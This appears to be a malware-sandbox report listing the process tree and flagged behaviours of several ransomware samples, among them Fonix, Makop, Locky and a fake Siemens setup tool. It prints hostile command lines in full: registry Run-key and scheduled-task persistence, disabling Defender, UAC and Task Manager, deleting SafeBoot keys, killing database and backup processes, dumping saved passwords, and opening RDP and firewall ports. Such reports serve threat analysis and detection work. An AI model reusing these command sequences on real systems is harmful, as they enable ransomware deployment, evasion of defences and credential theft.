\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DelayedDesktopSwitchTimeout = "5" Setup-Siemens.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters Setup-Siemens.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP Setup-Siemens.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Setup-Siemens.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Setup-Siemens.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 7952 attrib.exe 5056 attrib.exe 6108 attrib.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
- Executes dropped EXE
PID:1992
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00417.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4248
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2824
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3280 -
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2460 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe" "C:\Users\Admin\AppData\Local\HostSystem.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Local\HostSystem.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7028 -
C:\Users\Admin\AppData\Local\HostSystem.exe"C:\Users\Admin\AppData\Local\HostSystem.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7412 -
C:\Users\Admin\AppData\Local\HostSystem.exe"C:\Users\Admin\AppData\Local\HostSystem.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7696 -
C:\ProgramData\1\1.exeC:\ProgramData\1\1.exe -f "C:\ProgramData\Browsers-Passwords.txt"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3532
-
-
C:\ProgramData\1\2.exeC:\ProgramData\1\2.exe -f "C:\ProgramData\FTP-Passwords.txt"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7364
-
-
-
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exeHEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- System Location Discovery: System Language Discovery
PID:1096
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exeHEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3304 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TIyftrEBuQxce" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD9DC.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6656
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe"{path}"4⤵
- Executes dropped EXE
PID:6784
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe"{path}"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:7376 -
C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe"C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6856
-
-
C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe"C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3320
-
-
C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe"C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5804
-
-
C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe"C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc5⤵PID:7660
-
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exeHEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3704
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
- System Location Discovery: System Language Discovery
PID:3724 -
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 14⤵
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\SysWOW64\timeout.exetimeout 15⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5352
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"4⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops autorun.inf file
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
PID:5960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe > nul5⤵
- System Location Discovery: System Language Discovery
PID:3816
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 11924⤵
- Program crash
PID:5636
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3492 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 12644⤵
- Program crash
PID:7928
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 12644⤵
- Program crash
PID:7576
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exeHEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4168 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 2524⤵
- Program crash
PID:1616
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2384
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exeHEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe3⤵
- Executes dropped EXE
PID:1272 -
C:\Windows\SYSTEM32\cmd.execmd.exe /C Del /f /q "C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe"4⤵PID:7592
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exeHEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe3⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
PID:3388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4374⤵PID:3244
-
C:\Windows\system32\chcp.comchcp 4375⤵PID:2292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F4⤵PID:5520
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"4⤵
- Drops startup file
PID:5196
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"4⤵PID:5504
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F4⤵PID:2480
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:6020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"4⤵
- Hide Artifacts: Hidden Files and Directories
PID:6268 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"5⤵
- Drops startup file
- Views/modifies file attributes
PID:7952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f4⤵PID:7400
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f5⤵
- Adds Run key to start application
PID:6668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f4⤵PID:7232
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f5⤵
- Adds Run key to start application
PID:5828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f4⤵PID:6308
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f5⤵
- Adds Run key to start application
PID:2824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f4⤵PID:7396
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f5⤵
- Adds Run key to start application
PID:7348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /RU SYSTEM /RL HIGHEST /F4⤵PID:6856
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix11 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /RU SYSTEM /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix10 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /F4⤵PID:8056
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN fonix10 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:7932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s XINOF.exe4⤵
- Hide Artifacts: Hidden Files and Directories
PID:7668 -
C:\Windows\system32\attrib.exeattrib +h +s XINOF.exe5⤵
- Views/modifies file attributes
PID:5056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\XINOF.exe4⤵
- Hide Artifacts: Hidden Files and Directories
PID:5384 -
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\XINOF.exe5⤵
- Views/modifies file attributes
PID:6108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵PID:6764
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q5⤵PID:7076
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q6⤵
- Modifies file permissions
PID:7604
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f4⤵PID:4288
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f5⤵PID:7544
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit4⤵PID:7368
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*5⤵PID:6780
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*6⤵
- Kills process with taskkill
PID:6436
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*5⤵
- Kills process with taskkill
PID:1652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpriv.key C:\ProgramData\Cpriv.key4⤵PID:7188
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy Cpub.key C:\ProgramData\Cpub.key4⤵PID:6700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID4⤵PID:4072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\Cpriv.key %userprofile%\Desktop\Cpriv.key4⤵PID:320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\How To Decrypt Files.hta" "%userprofile%\Desktop\How To Decrypt Files.hta"4⤵PID:5636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f4⤵PID:6972
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵PID:3712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f4⤵PID:7360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f5⤵PID:7032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F4⤵PID:5412
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F5⤵PID:6836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F4⤵PID:1952
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F5⤵PID:6496
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic os get Caption /value >>C:\ProgramData\OS4⤵PID:7512
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption /value5⤵PID:4136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic OS Get LastBootUpTime >>C:\ProgramData\BootTime4⤵PID:4388
-
C:\Windows\System32\Wbem\WMIC.exewmic OS Get LastBootUpTime5⤵PID:904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c hostname>>C:\ProgramData\HostName4⤵PID:4048
-
C:\Windows\system32\HOSTNAME.EXEhostname5⤵PID:2480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4374⤵PID:448
-
C:\Windows\system32\chcp.comchcp 4375⤵PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | findstr /b dis >>C:\ProgramData\AV4⤵PID:4616
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List5⤵PID:2492
-
-
C:\Windows\system32\findstr.exefindstr /b dis5⤵PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\WindowsUpdate.hta" && exit4⤵PID:8120
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\WindowsUpdate.hta"5⤵
- Checks computer location settings
- Modifies registry class
PID:6964 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\WindowsUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:3604
-
-
-
-
-
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exeHEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exeHEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe4⤵PID:3308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 692 -s 2684⤵
- Program crash
PID:388
-
-
-
C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exeTrojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\920A.tmp\920B.bat C:\Users\Admin\Desktop\00417\Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe"4⤵PID:956
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Siemens\syngo /v TS+ /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:5504
-
-
C:\Windows\system32\reg.exereg save HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\UAC.reg /y5⤵
- Suspicious use of AdjustPrivilegeToken
PID:5948
-
-
C:\Users\Admin\AppData\Local\Temp\920A.tmp\Setup-Siemens.exeSetup-Siemens.exe /LicenseKey SIEM-ENS0-5349-454D5⤵
- Modifies security service
- UAC bypass
- Windows security bypass
- Server Software Component: Terminal Services DLL
- Allows Network login with blank passwords
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Modifies WinLogon
- System Location Discovery: System Language Discovery
- System policy modification
PID:5584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain6⤵PID:1612
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private6⤵PID:4288
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=806⤵PID:3748
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow protocol=TCP localport=807⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 443" dir=in action=allow protocol=TCP localport=4436⤵PID:6076
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 443" dir=in action=allow protocol=TCP localport=4437⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=33896⤵PID:4404
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=33897⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 80" dir=out action=allow protocol=TCP localport=806⤵PID:5804
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 80" dir=out action=allow protocol=TCP localport=807⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 443" dir=out action=allow protocol=TCP localport=4436⤵PID:5900
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 443" dir=out action=allow protocol=TCP localport=4437⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Open Port 3389" dir=out action=allow protocol=TCP localport=33896⤵PID:3044
-
C:\Windows\System32\netsh.exenetsh advfirewall firewall add rule name="Open Port 3389" dir=out action=allow protocol=TCP localport=33897⤵
